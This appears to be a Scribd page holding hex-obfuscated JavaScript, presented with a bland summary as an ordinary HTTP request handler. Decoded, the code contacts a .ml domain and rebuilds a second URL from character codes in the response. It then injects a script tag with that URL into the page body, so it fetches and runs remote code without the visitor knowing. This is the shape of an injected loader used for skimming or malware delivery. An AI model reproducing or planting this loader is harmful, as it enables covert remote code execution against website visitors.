0% found this document useful (0 votes)
45 views1 page

ClientCopy Encoded Aug1319

This document defines variables and functions to make an HTTP request and handle the response. It creates an XMLHttpRequest object, sets an onreadystatechange handler, opens a GET request to a URL, and sends the request. The handler checks the ready state and status to extract the response text and add a script tag to the body.

Uploaded by

SVolo Stan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
45 views1 page

ClientCopy Encoded Aug1319

This document defines variables and functions to make an HTTP request and handle the response. It creates an XMLHttpRequest object, sets an onreadystatechange handler, opens a GET request to a URL, and sends the request. The handler checks the ready state and status to extract the response text and add a script tag to the body.

Uploaded by

SVolo Stan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

var

_0x746f=["\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65"
,"\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x2C","\x73
\x70\x6C\x69\x74","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","","\x6C\x65\x
6E\x67\x74\x68","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x3C\x73\x63\x7
2\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x
63\x72\x69\x70\x74\x27","\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x73\x63\x72\x69\x7
0\x74\x3E","\x61\x70\x70\x65\x6E\x64","\x62\x6F\x64\x79","\x47\x45\x54","\x68\x74\x
74\x70\x73\x3A\x2F\x2F\x6F\x6E\x63\x72\x65\x61\x74\x69\x76\x65\x63\x6F\x64\x65\x2E\
x6D\x6C\x2F\x41\x55\x47\x55\x53\x54\x31\x33\x32\x30\x31\x39\x2F\x61\x66\x69\x66\x64
\x6B\x66\x6D\x6B\x64\x6C\x70\x68\x2E\x70\x68\x70","\x6F\x70\x65\x6E","\x73\x65\x6E\
x64"];var
_0xdf3f=[_0x746f[0],_0x746f[1],_0x746f[2],_0x746f[3],_0x746f[4],_0x746f[5],_0x746f[
6],_0x746f[7],_0x746f[8],_0x746f[9],_0x746f[10],_0x746f[11],_0x746f[12],_0x746f[13]
,_0x746f[14],_0x746f[15],_0x746f[16],_0x746f[17]];var
_0x944f=[_0xdf3f[0],_0xdf3f[1],_0xdf3f[2],_0xdf3f[3],_0xdf3f[4],_0xdf3f[5],_0xdf3f[
6],_0xdf3f[7],_0xdf3f[8],_0xdf3f[9],_0xdf3f[10],_0xdf3f[11],_0xdf3f[12],_0xdf3f[13]
,_0xdf3f[14],_0xdf3f[15],_0xdf3f[16],_0xdf3f[17]];var xhttp= new
XMLHttpRequest;xhttp[_0x944f[0]]= function(){if(4== this[_0x944f[1]]&& 200==
this[_0x944f[2]]){for(var _0xb32cx4=this[_0x944f[5]][_0x944f[4]]
(_0x944f[3]),_0xb32cx5=_0x944f[6],_0xb32cx6=0;_0xb32cx6<= _0xb32cx4[_0x944f[7]]-
1;){_0xb32cx5+= String[_0x944f[8]](_0xb32cx4[_0xb32cx6]),_0xb32cx6+= 1};var
_0xb32cx7=_0x944f[9];_0xb32cx7= _0xb32cx7+ _0x944f[10]+ _0xb32cx5+ _0x944f[11],$
(_0x944f[13])[_0x944f[12]](_0xb32cx7)}},xhttp[_0x944f[16]]
(_0x944f[14],_0x944f[15],!0),xhttp[_0x944f[17]]()

You might also like